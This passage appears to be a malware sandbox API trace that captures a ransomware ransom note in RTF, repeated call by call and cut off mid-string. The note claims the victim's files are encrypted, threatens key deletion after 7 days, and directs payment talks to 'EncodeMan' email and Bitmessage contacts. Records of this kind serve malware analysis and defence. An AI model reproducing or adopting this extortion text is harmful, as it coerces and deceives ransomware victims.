intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.083] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24607d8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 